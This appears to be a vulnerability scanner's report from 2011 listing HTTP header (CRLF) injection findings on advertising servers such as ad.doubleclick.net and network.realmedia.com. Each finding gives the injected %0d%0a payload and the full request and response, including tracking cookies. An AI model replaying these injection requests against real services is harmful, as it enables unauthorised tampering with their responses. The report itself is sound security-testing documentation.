GET /7a2ff%0d%0a9d4a8ed3156/N3880.adwords.google.com/B5109627.9;dcove=o;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BeUAfGgGGTenHFsfOlQeE-o3pDun1-pYCkd_lxR-5zZWPRAAQARgBIM-2sAM4AGDJBrIBDHd3dy53b290LmNvbboBCjMwMHgyNTBfYXPIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-YAswhuAIYwAIByALp8KEa4AIA6gIXd29vdC1jb21tdW5pdHkxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA7MC6APtAvUDBAUAxOAEAQ&num=1&sig=AGiWqtxxObGMGdGDDOWnMdJXAptYdjLF1g&client=ca-pub-2332856072838068&adurl=;ord=1302051679? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
The value of REST URL parameter 1 is copied into the Location response header. The payload 231f9%0d%0ac79f87a49a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /231f9%0d%0ac79f87a49a/N4518.247RealMedia/B4955444.24 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/231f9 c79f87a49a/N4518.247RealMedia/B4955444.24: Date: Sun, 20 Mar 2011 14:02:46 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 3f42a%0d%0a1a2c269b119 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3f42a%0d%0a1a2c269b119/N553.mediamath/B5123370.14 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/3f42a 1a2c269b119/N553.mediamath/B5123370.14: Date: Sun, 20 Mar 2011 14:02:43 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 427da%0d%0a1873d504805 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /427da%0d%0a1873d504805/N553.mediamath/B5123370.39;sz=300x250;pc=;click1=http://pixel.mathtag.com/click/img?mt_aid=62143273837836637&mt_id=111040&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=62143273837836637? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidder.mathtag.com/iframe/notify?exch=pub&id=5aW95q2jLzEvTkROQk9FRkNSa0V0TnpRNU55MDBOekZCTFRsQlJqWXRNamszTkVReE4wVkdNek0xL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MjE0MzI3MzgzNzgzNjYzNy8xMTEwNDAvMTAyMDY1LzMvUWk0TlZFWk5SbHYyNzBhYklEZU9pd3Nzb1g4SlNGczg1RjlCN293LWNUay8/InA55NeIGGV4hzZENaajIegtkxo&price=3.757000 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
The value of REST URL parameter 1 is copied into the Location response header. The payload 26cf7%0d%0a4286c6de9c2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /26cf7%0d%0a4286c6de9c2/N553.mediamath/B5123370.4 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/26cf7 4286c6de9c2/N553.mediamath/B5123370.4: Date: Sun, 20 Mar 2011 14:02:43 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 48f5e%0d%0a86723e2b5e4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /48f5e%0d%0a86723e2b5e4/N5853.3630.1790008898421/B5154579.5 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/48f5e 86723e2b5e4/N5853.3630.1790008898421/B5154579.5: Date: Sun, 20 Mar 2011 14:02:45 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 9f08c%0d%0aa24e6e6783e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /9f08c%0d%0aa24e6e6783e/N884.AOL-Advertising/B5290576.2 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/9f08c a24e6e6783e/N884.AOL-Advertising/B5290576.2: Date: Sun, 20 Mar 2011 14:02:45 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 24fc5%0d%0a0c5c8426dac was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /24fc5%0d%0a0c5c8426dac/cm.mtv/games_010111;net=cm;u=,cm-57639981_1300624460,11e4f07c0988ac7,music,ax.300-am.bk-cm.sportsreg-cm.sports_m-cm.ent_m-qc.ac-ex.6-bz.30-bz.51-bz.25-bz.ab-bz.ae-wfm.difi_h-iblocal.sports_h;;cmw=nurl;sz=728x90;net=cm;env=ifr;ord1=595575;contx=music;an=300;dc=d;btg=am.bk;btg=cm.sportsreg;btg=cm.sports_m;btg=cm.ent_m;btg=qc.ac;btg=ex.6;btg=bz.30;btg=bz.51;btg=bz.25;btg=bz.ab;btg=bz.ae;btg=wfm.difi_h;btg=iblocal.sports_h;ord=[timestamp]? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://viacom.adbureau.net/hserver/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/24fc5 0c5c8426dac/cm.mtv/games_010111;net=cm;u=,cm-57639981_1300624460,11e4f07c0988ac7,music,ax.300-am.bk-cm.sportsreg-cm.sports_m-cm.ent_m-qc.ac-ex.6-bz.30-bz.51-bz.25-bz.ab-bz.ae-wfm.difi_h-iblocal.sports_h;;cmw=nurl;sz=728x90;net=cm;env=ifr;ord1=595575;contx=music;an=300;dc=d;btg=am.bk;btg=cm.s: Date: Sun, 20 Mar 2011 12:37:04 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 511aa%0d%0a5a60d0294e5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /511aa%0d%0a5a60d0294e5/lj.homepage/loggedout;a=1;r=0;w=0;c=se;pt=se;vert=_code;sz=728x90;pos=t;tile=1;ord=7173672060? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.livejournal.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/511aa 5a60d0294e5/lj.homepage/loggedout;a=1;r=0;w=0;c=se;pt=se;vert=_code;sz=728x90;pos=t;tile=1;ord=7173672060: Date: Sun, 20 Mar 2011 12:41:26 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 870fd%0d%0a625d057310c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /870fd%0d%0a625d057310c/oiq.rmx/;click0=http://ad.yieldmanager.com/clk?2,13%3B2e75bab3029d4c42%3B12ed3431171,0%3B%3B%3B2825860846,NBAAABt0GACHloQAAAAAAAPDIQAAAAAAAgAAAAYAAAAAAP8AAAABCHmeHQAAAAAAhIAMAAAAAADbUiwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADH0QoAAAAAAAIAAwAAAAAAcBFD0y4BAAAAAAAAADdlNzFjN2Q0LTUyZWUtMTFlMC1hZTRjLTAwMzA0OGQ2ZDNhYwA4nyoAAAA=,,http%3A%2F%2Frotator.adjuggler.com%2Fservlet%2Fajrotator%2F1007517%2F0%2Fvh%3Fz%3Dpdn%26dim%3D753181%26pos%3D7%26kw%3D%26click%3D,;otp=11047;tile=1;sz=728x90;u=rmxli_2904795|surl_http://rotator.adjuggler.com/servlet/ajrotator/1007517/0/vh?z=pdn&dim=753181&pos=7&kw=&click=|pr_0.3500|pid_298720;ord=4549932463560253? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?NBAAABt0GACHloQAAAAAAAPDIQAAAAAAAgAAAAYAAAAAAP8AAAABCHmeHQAAAAAAhIAMAAAAAADbUiwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADH0QoAAAAAAAIAAwAAAAAAR7bz.dR4wT.2KFyPwvXYP-N6FK5H4co.MzMzMzMz4z9nZmZmZmbWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACfI8Gb.tjOCUrprrxPD33NNXpvaMrAs.Da0NhMAAAAAA==,,http%3A%2F%2Frotator.adjuggler.com%2Fservlet%2Fajrotator%2F1007517%2F0%2Fvh%3Fz%3Dpdn%26dim%3D753181%26pos%3D7%26kw%3D%26click%3D,Z%3D728x90%26s%3D1602587%26_salt%3D225907243%26B%3D10%26u%3Dhttp%253A%252F%252Frotator.adjuggler.com%252Fservlet%252Fajrotator%252F1007517%252F0%252Fvh%253Fz%253Dpdn%2526dim%253D753181%2526pos%253D7%2526kw%253D%2526click%253D%26r%3D0,7e71c7d4-52ee-11e0-ae4c-003048d6d3ac User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
The value of REST URL parameter 1 is copied into the Location response header. The payload 75330%0d%0a2d5d580153d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /75330%0d%0a2d5d580153d/teennick.nol/atf_j_s/shows/the_nightlife/index;sec0=shows;sec1=the_nightlife;sec2=index;pos=atf;cat=2;!category=hs_the_nightlife;show=hs_the_nightlife;demo=D;tag=adj;mtype=standard;sz=6x6;tile=1;u=pos-atf%7Ccat-2%7C!category-hs_the_nightlife%7Cshow-hs_the_nightlife%7Cdemo-D%7Ctag-adj%7Cmtype-standard%7Csz-6x6%7Ctile-1;ord=964462979417294200? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.teennick.com/shows/the-nightlife User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/75330 2d5d580153d/teennick.nol/atf_j_s/shows/the_nightlife/index;sec0=shows;sec1=the_nightlife;sec2=index;pos=atf;cat=2;!category=hs_the_nightlife;show=hs_the_nightlife;demo=D;tag=adj;mtype=standard;sz=6x6;tile=1;u=pos-atf|cat-2|!category-hs_the_nightlife|show-hs_the_nightlife|demo-D|tag-adj|mtype: Date: Sun, 20 Mar 2011 14:05:31 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 53f28%0d%0ab4eaf05d29e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /53f28%0d%0ab4eaf05d29e/N1558.advertising.com/B3897970.13 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/53f28 b4eaf05d29e/N1558.advertising.com/B3897970.13: Date: Sun, 20 Mar 2011 14:02:51 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 9897d%0d%0a37e2c0d48a4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /9897d%0d%0a37e2c0d48a4/N3340.247realmedia.com/B5245409.18 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/9897d 37e2c0d48a4/N3340.247realmedia.com/B5245409.18: Date: Sun, 20 Mar 2011 14:02:48 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 483af%0d%0a3b55be4a6ed was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /483af%0d%0a3b55be4a6ed/N4518.247RealMedia/B4955444.24 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/483af 3b55be4a6ed/N4518.247RealMedia/B4955444.24: Date: Sun, 20 Mar 2011 14:02:51 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 53bf4%0d%0a994ab283e15 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /53bf4%0d%0a994ab283e15/N5853.3630.1790008898421/B5154579.5 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/53bf4 994ab283e15/N5853.3630.1790008898421/B5154579.5: Date: Sun, 20 Mar 2011 14:02:52 GMT Server: GFE/2.0 Connection: close
The value of the exch request parameter is copied into the x-mm-debug response header. The payload d437a%0d%0a0b61def368b was submitted in the exch parameter. This caused a response containing an injected HTTP header.
Request
GET /iframe/notify?exch=d437a%0d%0a0b61def368b&id=5aW95q2jLzEvTkROQk9FRkNSa0V0TnpRNU55MDBOekZCTFRsQlJqWXRNamszTkVReE4wVkdNek0xL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MjE0MzI3MzgzNzgzNjYzNy8xMTEwNDAvMTAyMDY1LzMvUWk0TlZFWk5SbHYyNzBhYklEZU9pd3Nzb1g4SlNGczg1RjlCN293LWNUay8/InA55NeIGGV4hzZENaajIegtkxo&price=3.757000 HTTP/1.1 Host: bidder.mathtag.com Proxy-Connection: keep-alive Referer: http://www.woot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mt_mop=10004:1299934992|1:1297862934|10001:1297818481|11:1299460723|2:1299285586|3:1299090747|4:1299460679|5:1297863542|9:1297862322; ts=1300283399; uuid=4d5b2371-3928-7a83-24fb-d52328f5624b
Response
HTTP/1.1 404 Not found Date: Sun, 20 Mar 2011 12:36:33 GMT Server: MMBD/3.4.6 Content-Type: text/html; charset=utf-8 Content-Length: 18 x-mm-debug: exchange not found - d437a 0b61def368b x-mm-host: ewr-bidder-x4 Connection: keep-alive
The value of REST URL parameter 4 is copied into the OAS_DE_ERROR response header. The payload 784d2%0d%0a594567822af was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /RealMedia/ads/adstream.cap/784d2%0d%0a594567822af HTTP/1.1 Host: network.realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BCN2010110741=2; RMFL=011Pxp1fU10KeT; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0c45525d5f4f58455e445a4a423660; NXCLICK2=011Pxp1fNX_TRACK_Nationalgeographic/Retarget_Natgeorealhomepage_Nonsecure!y!B3!KeT!ppm3; OAX=rcHW801i4doAAvyI; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011Q1HsmO2016kC|O1016oi|O1016oj|O1016vE|O1016x1|O1016xy|O1016yW|O10170Y|O20171t|O10172C|O20179T|O10179n; S247=3SHMdODZXwiULLqkivponR9TFGKNXO3633WY_nuhPf0QQPdf7d3Vdqg; S247S=1;
Response
HTTP/1.1 400 Bad Request Date: Sun, 20 Mar 2011 14:01:15 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" OAS_DE_ERROR: OAS-Cap: No query string found. request to 'network.realmedia.com' for '/RealMedia/ads/adstream.cap/784d2 594567822af', referer '', handler 'cap-add' Content-Length: 313 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0c45525d5f4f58455e445a4a423660;expires=Sun, 20-Mar-2011 14:02:15 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>400 Bad Request</title> </head><body> <h1>Bad Request</h1> <p>Your browser sent a request that this server could not understand.< ...[SNIP]...
The value of the c request parameter is copied into the Set-Cookie response header. The payload a4db0%0d%0a5a00c79db3e was submitted in the c parameter. This caused a response containing an injected HTTP header.
The value of the dv request parameter is copied into the OAS_DE_ERROR response header. The payload cc955%0d%0aae4dc5c54c4 was submitted in the dv parameter. This caused a response containing an injected HTTP header.
HTTP/1.1 500 Internal Server Error Date: Sun, 20 Mar 2011 13:31:35 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" OAS_DE_ERROR: error converting 'cc955 ae4dc5c54c4' value to numeric value [i]. request to 'network.realmedia.com' for '/RealMedia/ads/adstream.cap/1379005222', referer 'http://redcated/APM/iview/142856445/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=0000133c0000000000000000/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1/relocate=', handler 'cap-add' Content-Length: 621 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Sun, 20-Mar-2011 05:22:14 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>500 Internal Server Error</title> </head><body> <h1>Internal Server Error</h1> <p>The server encountered an internal error or mis ...[SNIP]...
The value of the s request parameter is copied into the OAS_DE_ERROR response header. The payload a9638%0d%0ad85165efc26 was submitted in the s parameter. This caused a response containing an injected HTTP header.
HTTP/1.1 500 Internal Server Error Date: Sun, 20 Mar 2011 13:31:36 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" OAS_DE_ERROR: Cannot convert 'a9638 d85165efc26' to bool. request to 'network.realmedia.com' for '/RealMedia/ads/adstream.cap/1379005222', referer 'http://redcated/APM/iview/142856445/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=0000133c0000000000000000/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1/relocate=', handler 'cap-add' Content-Length: 621 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Sun, 20-Mar-2011 05:22:14 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>500 Internal Server Error</title> </head><body> <h1>Internal Server Error</h1> <p>The server encountered an internal error or mis ...[SNIP]...
The value of REST URL parameter 4 is copied into the OAS_DE_ERROR response header. The payload 6a8b9%0d%0a06fba2b5fbf was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /RealMedia/ads/adstream.cap/6a8b9%0d%0a06fba2b5fbf HTTP/1.1 Host: network.realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BCN2010110741=2; RMFL=011Pxp1fU10KeT; SDataR=1; NSC_o1efm_qppm_iuuq=ffffffff09499e0c45525d5f4f58455e445a4a423660; NXCLICK2=011Pxp1fNX_TRACK_Nationalgeographic/Retarget_Natgeorealhomepage_Nonsecure!y!B3!KeT!ppm3; OAX=rcHW801i4doAAvyI; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011Q1HsmO2016kC|O1016oi|O1016oj|O1016vE|O1016x1|O1016xy|O1016yW|O10170Y|O20171t|O10172C|O20179T|O10179n; S247=3SHMdODZXwiULLqkivponR9TFGKNXO3633WY_nuhPf0QQPdf7d3Vdqg; S247S=1;
Response
HTTP/1.1 400 Bad Request Date: Sun, 20 Mar 2011 14:01:14 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" OAS_DE_ERROR: OAS-Cap: No query string found. request to 'network.realmedia.com' for '/RealMedia/ads/adstream.cap/6a8b9 06fba2b5fbf', referer '', handler 'cap-add' Content-Length: 313 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0c45525d5f4f58455e445a4a423660;expires=Sun, 20-Mar-2011 14:02:14 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>400 Bad Request</title> </head><body> <h1>Bad Request</h1> <p>Your browser sent a request that this server could not understand.< ...[SNIP]...
The value of the c request parameter is copied into the Set-Cookie response header. The payload 4abb5%0d%0aa0d57ae0292 was submitted in the c parameter. This caused a response containing an injected HTTP header.
The value of the dv request parameter is copied into the OAS_DE_ERROR response header. The payload fe780%0d%0a47fbab57590 was submitted in the dv parameter. This caused a response containing an injected HTTP header.
HTTP/1.1 500 Internal Server Error Date: Sun, 20 Mar 2011 13:31:35 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" OAS_DE_ERROR: error converting 'fe780 47fbab57590' value to numeric value [i]. request to 'network.realmedia.com' for '/RealMedia/ads/adstream.cap/574659390', referer 'http://redcated/APM/iview/142856443/direct;wi.300;hi.250/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014700000000000000000/height=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1/relocate=', handler 'cap-add' Content-Length: 621 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Sun, 20-Mar-2011 05:22:13 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>500 Internal Server Error</title> </head><body> <h1>Internal Server Error</h1> <p>The server encountered an internal error or mis ...[SNIP]...
The value of the s request parameter is copied into the OAS_DE_ERROR response header. The payload c5712%0d%0a3c8b5d6e8a7 was submitted in the s parameter. This caused a response containing an injected HTTP header.
